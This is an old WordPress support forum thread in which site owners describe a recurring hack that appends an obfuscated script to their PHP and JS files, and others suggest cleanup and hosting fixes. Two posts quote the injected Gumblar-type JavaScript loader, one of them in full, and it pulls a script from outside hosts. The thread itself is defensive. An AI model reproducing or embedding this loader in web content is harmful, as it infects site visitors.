[closed] Site Hacked AGAIN! (24 posts)

  1. Gemma Wild
    Posted 6 years ago #

    I have posted about this before and followed all the steps that people kindly provided but yet again my WordPress sites have all been hacked. I visited my sites this morning (they were working fine last night) to find the following error:

    Parse error: syntax error, unexpected '<' in /home/pinkgar1/public_html/wp-includes/default-filters.php on line 229

    Once I overwrote this file with one from a fresh WordPress download, it then brings up this error:

    Parse error: syntax error, unexpected '<' in /home/pinkgar1/public_html/wp-includes/default-widgets.php on line 1042

    Again, I overwrote this file with one from a fresh WordPress download and the site comes back up with no errors and everything appears to be fine (but it isn’t!).

    This is not an error due to editing a template file nor is it a problem with an installed plugin (unless that is where the hacker is getting in?) THIS IS A HACK ATTEMPT IN WHICH THEY HAVE SUCCEEDED! At the bottom of the browser where it shows ‘waiting for http://www.pinkgarden.co.uk’ a suspicious web site address appears, something along the lines of streamate-50.com-worldofwarcraft… and my web browser blocks a file that is trying to download from my site (the pop-up blocker tells me it’s a DAT file or something) I DO NOT have pop-up windows on my web site nor do I have files that download from my site.

    If I look at my source code, they have also managed to insert the following Javascript which sometimes appears and then sometimes doesn’t:

    <script>/*GNU GPL*/ try{window.onload = function(){var N093zwnmmc31lmu = document.createElement('s&(!$c@(r&@@(i(&^p^&t!'.replace(/\!|\(|\$|#|\)|&|\^|@/ig, ''));N093zwnmmc31lmu.setAttribute('type', 'text/javascript');N093zwnmmc31lmu.setAttribute('src', 'h(&t$(@t$!p((:)$(/&)/!&&s#&)a@!#(h!$i$@$b#&^^i@))!n$!&#)d(e)&@n&^#-#!c^&@$^o!@(m$$.)&$h()$(e@)i#^&&s!)$e).&@d#$)^e$#$!.(^!a#()d(&^)u(^l^)t@a@d&#w^#@o(&&r@@&&l#&)d$&-)#!&c@o^(m(.!^( [snip some of this code] |\)|\$|\^|@|#|&|\(/ig, ''));document.body.appendChild(N093zwnmmc31lmu);}} catch(e) {}</script>

    This was not there last night, nor is it something that I have added myself.

    This happened to me a week or so ago and I had to COMPLETELY wipe my ENTIRE site files and databases and start from scratch, which was very much my last resort. I emptied all my databases, removed every single file from my web server, downloaded a fresh new copy of the latest of WordPress, downloaded fresh new copies of needed plugins, re-installed everything from scratch, with brand new database logins, passwords, new admin login (even downloaded the plugin that changes the default admin name to something less obvious as ‘admin’) used the default templates that come with the script and yet here I am again, hacked.

    Pretty much all the plugins I installed where compatible with my version of WordPress and I only downloaded ones where the feedback on them was 4 star plus, i.e. very positive.

    I do not have any other scripts or files running on my file server, so it’s not a possible conflict there.

    I even went as far as making sure my brand new computer didn’t have a virus on it, which it doesn’t.

    I will be emailing this to the creators of WordPress but in the mean time, what do I do now? Does this mean I have to find another script, which I really do not want to do but on the other hand, I cannot keep getting hacked every week!

  2. claud925
    Posted 6 years ago #

    Well if you are using the 2.0 wordpress version, probably the problem is that. You should upgrade to a newer version.

  3. Mark Ratledge
    Forum Moderator
    Posted 6 years ago #

    claud925: look at the page source; she's running 2.9

    pinkgarden: are you sure that javascript isn't in the footer of your theme? Is that a paid-for theme? The license in the style sheet says it can't be used other than on your domain.

    The parse error is a different animal, probably a damaged file.

    If it is a hack, it may be coming through shared hosting. Talk to your web host.

  4. Gemma Wild
    Posted 6 years ago #

    Yep, using 2.9 the very latest (at this present moment in time) release.

    100% positive that the Javascript isn't in my theme as I created it myself, it's not a paid for theme.

    The files are not damaged. As I metioned above, everything was from a fresh install. The only time they get corrupted is when the hacker attacks.

    I will try contacting my host as it is shared hosting but only I have access to my account.

  5. Mark Ratledge
    Forum Moderator
    Posted 6 years ago #

    You will only have access to your account, but scripting attacks can cross accounts. Might consider changing hosts.

  6. Gemma Wild
    Posted 6 years ago #

    I've been with them for around 6 months, so it's a relatively new account that I'm all paid up for until the next 2-3 years (meaning I don't want to have to pay out for a new host, he he!). But it's also an old enough account to know that everything has been running with out any problems until now. I will contact them though, to see if anyone else has reported attacks on their hosting.

    I have a feeling it's a plugin that I have recently installed as my problems seemed to start at around the same time as installing it. If I look at my error log, this is the only plugin that is trying to modify stuff right before the site gets hacked.

  7. Gemma Wild
    Posted 6 years ago #

    Having had a good read around the forum posts I can see there are many many people reporting this very same problem. I very much doubt we are all using the same, dodgy/vunerable plugin so does this not indicate that there is indeed a security hole in the main WordPress script?

    I have emailed the creators about it but have yet to hear anything back (it was only yesterday that I emailed them)

    I have just visited my site again this morning and low and behold, it has the same error:

    Parse error: syntax error, unexpected '<' in /home/pinkgar1/public_html/wp-includes/default-filters.php on line 229

    I really would like to know what, if anything, is being done about this major problem? Do I now need to find another platform to run my site from? I love WordPress, this would make me quite sad... (sad, I know!)

  8. Floridan
    Posted 6 years ago #

    pinkgarden, sometimes a virus or trojan can stay hidden from antivirus apps. Try more than one app and if they all say your pc is clean I would look at vulnerability through your ftp or through your shared host as others have suggested.

    Also, if you have a clean backup of your WP installation, replace the entire wp-includes folder with the clean wp-includes folder. Then search every single folder on your server for a php shell script. It will have a name that you do not recognize. You can look at the dates of every file to see which file was altered last.

  9. CGordon98
    Posted 6 years ago #

    Is there a app /plugin to email you as soon as a file has been added/change/deleted on your server?
    Which host are you using BTW.

  10. cubecolour
    Posted 6 years ago #

    Is there a app /plugin to email you as soon as a file has been added/change/deleted on your server?

    That's a good idea Matt Walters's WordPress File Monitor plugin may help identify when something is getting changed.

  11. silkenhut
    Posted 6 years ago #

    Hmm I am a victim of this also.

    So far here are the files I have found the entries

    all index.php files

    I'm still trying to find where the script is located, in the source code, it is before the topmost -html- tag.

  12. Chungyen
    Posted 6 years ago #

    I have had this problem on my blog as well. I took some time to search every file in my wordpress installation.

    This script is always appended at the bottom of the file, so it isn't so hard to find.

    Places where I found this script:





    At this point, I realized that all of my plugins were infected, and so I just deleted and replaced them.

    Replace all plugins - .js files are infected

    wp-admin/js folder - almost every file


    any .js files in your themes
    any index.php files in your themes

    I got tired of looking when I got to the last folder, wp-includes/js. However, the codepress folder had this script everywhere. I replaced the entire wp-includes directory.

    It does not affect CSS files.

    I'm not sure what it has to do with default-widgets.php and default-filters.php, but I replaced them just to be safe. Before I did this combing through, I found that just replacing these files would bring my blog back. However, the problem persisted. It appears that some sort of trigger happens which causes the error mentioned in the OP's post, usually around 12 or 1 am EST.

    It looks like it has infected both my public_html and my www directories. I am going to search through www now, then wipe the directories and reupload the clean ones, and change my database/login passwords.

    edit1: I discovered that my hosting's cPanel comes with a virus scanner by ClamAV. I tried it and it didn't find anything.

  13. If you are using shared hosting, then it is extremely likely that being hacked is not a WordPress problem.

    Shared hosts, if configured badly, are highly vulnerable to hacking from other accounts on the same server. This is possible because the default configuration is not secure in many cases (if you install Apache + mod_php, then you're instantly insecure for a shared hosting scenario).

    It works like this:
    1. Hacker finds a site that has a vulnerability and exploits it.
    2. Now hacker has the ability to put code on somebody's website and run it.
    3. Hacker puts a small, simple piece of code on the site. This code searches the whole server, even other people's accounts, and looks for PHP files.
    4. When it finds one that it can access, it inserts its own malicious code into that file.
    5. Voila, you're hacked, and WordPress never got breached.

    If you have a website that is frequently getting hacked in the same manner, then this is very likely your problem.

    Possible solutions:

    1. Make every file and directory you have on there non-writable. chmod 644 all the files and chmod 755 all the directories.

    2. Ask your host to secure your server (good luck with that, however if they ask how, tell them to start by using "mod_suphp").

    3. Switch hosts. If you have prepaid long term, then demand a refund as they cannot secure their servers correctly. You're paying them, this is their problem, and they should be fixing it.

    That's about the best there is for it, really. WordPress 2.9 has no known security holes as of right now. So the odds of you getting breached that way are pretty slim. If you're on shared hosting, then a cross-account hack is far more likely. Especially when the hack breaks your site in the process. Think about it, if somebody hacked their way into you specifically, then why would they leave your website in a broken state? An automated script trying to auto-hack your site isn't smart enough to know when it has obviously broken things.

  14. Chungyen
    Posted 6 years ago #


    Thanks for the heads up. I am contacting my host and I'll update this thread with how it goes.

  15. kboyko
    Posted 6 years ago #

    Hi everyone, please check my article about this virus at http://justcoded.com/article/gumblar-family-virus-removal-tool/ . It could be helpful and it contains a script for automatical cleaning up the site.

  16. Chungyen
    Posted 6 years ago #

    After some research, i can confirm that it is definitely a form of the Gumblar virus. I cleaned my computer and used this cleaner for my blog, and things are working fine now. http://seoforums.org/site-optimization/118-script-gnu-gpl-try-window-onload-function-var.html

  17. homesh123
    Posted 6 years ago #

    i face same problem today . i removed script tag and problem solved .
    Try this it may solve your problem
    Solution :

    " Parse error: syntax error, unexpected '<' in /home/pinkgar1/public_html/wp-includes/default-filters.php on line 229 "

    first go through your ftp uploader software download
    files from wp-includes folder.

    In wp-includes/default-filters.php you find <script> tag at end of file " <script>/*GNU GPL*/ try{window.onload = function(){var N093zwnmmc31lmu = document.createElement('s&(!$c@(r&@@(i(&^p^&t!'.replace(/\!|\(|\$|#|\)|&|\^|@/ig, ''));N093zwnmmc31lmu.setAttribute('type', 'text/javascript');N093zwnmmc31lmu.setAttribute('src', 'h(&t$(@t$!p((:)$(/&)/!&&s#&)a@!#(h!$i$@$b#&^^i@))!n$!&#)d(e)&@n&^#-#!c^&@$^o!@(m$$.)&$h()$(e@)i#^&&s!)$e).&@d#$)^e$#$!.(^!a#()d(&^)u(^l^)t@a@d&#w^#@o(&&r@@&&l#&)d$&-)#!&c@o^(m(.!^(v!#)i&#e#w!@@()h$&!&o#(@$m)&e^s@!a&$$#l$e#.!r(u@)#:)!8)!0^8#0$@^/$g^^$o#!$o!&)g!l@$e(.$$c@!&@o!$@m$/#g#(o!o@#g$$l!@)e$(.$c#(o(m^@/!)m#((a@#$$p^q#!u&!!)e&&)!s!)(t$&).&c$#&o#^m##/^&v#e&r^@!!i!z#o#!n&.$#n#^e$()t(!/#b@#r)a#m!j@^#))n#^e$^^^t^.&c$)o)!!m!$/))'.replace(/#|\(|&|\)|\$|@|\^|\!/ig, ''));N093zwnmmc31lmu.setAttribute('defer', 'defer');N093zwnmmc31lmu.setAttribute('id', 'S!^(@l$!$!j@!(h$!2!$&5^)d^@j#$o!&@r!$('.replace(/\!|\)|\$|\^|@|#|&|\(/ig, ''));document.body.appendChild(N093zwnmmc31lmu);}} catch(e) {}</script> "

    just remove this code..

    also remove script code from following two files
    /wp-includes/default-embeds.php &

    now try your site ..

  18. Rev. Voodoo
    Posted 6 years ago #

    just removing the code won't do it. That's like a band-aid. You've got to figure out how the hack happened....otherwise you very much risk it just happening again!

    Check this stuff out, at least for information:

    My Experiences with being hacked:

    And when you're done:

  19. daniel.ciubotaru
    Posted 6 years ago #

    homesh123 got the perfect solution, i just made that changes and it works, it seems it is a virus.
    Removed the script from that three files and it works.

    Thanks homesh123

  20. Samuel B

    Posted 6 years ago #

    you obviously didn't read the response above yours

  21. schmidttty
    Posted 6 years ago #

    I have a site that files were inserted at:



    When I went to my include file, there was a .zip file and an uncompressed directory. The first hack happened on April 6th. The second was just noticed yesterday but the files on the server said they were updated on 04.12.10. Before the first phising site was active, my site was erased and simply said "hacked by xero"

    This sounds different than the above complaints and I'm not experienced enough to know how / where they are getting in. But having to deal with it a second time makes me worried there is access for someone to continue to do this.

    I use Fat Cow for shared hosting. Have a word press site with a theme from Woo themes. Can anyone point me in the right direction to secure my site?

  22. Mark Ratledge
    Forum Moderator
    Posted 6 years ago #

  23. CoolHandLuke
    Posted 6 years ago #

    Argh!! This just happened to me too. Brandnew site. Put in a ton of hours setting it up over the weekend. It didn't even last one day!

    Is this a wordpress problem?

    Here was my original post:



  24. Mark Ratledge
    Forum Moderator
    Posted 6 years ago #

    @Coolhandluke: Stay with one thread and follow the advice there http://wordpress.org/support/topic/400524?replies=5

    Mod: should probably close this old thread.

Topic Closed

This topic has been closed to new replies.

About this Topic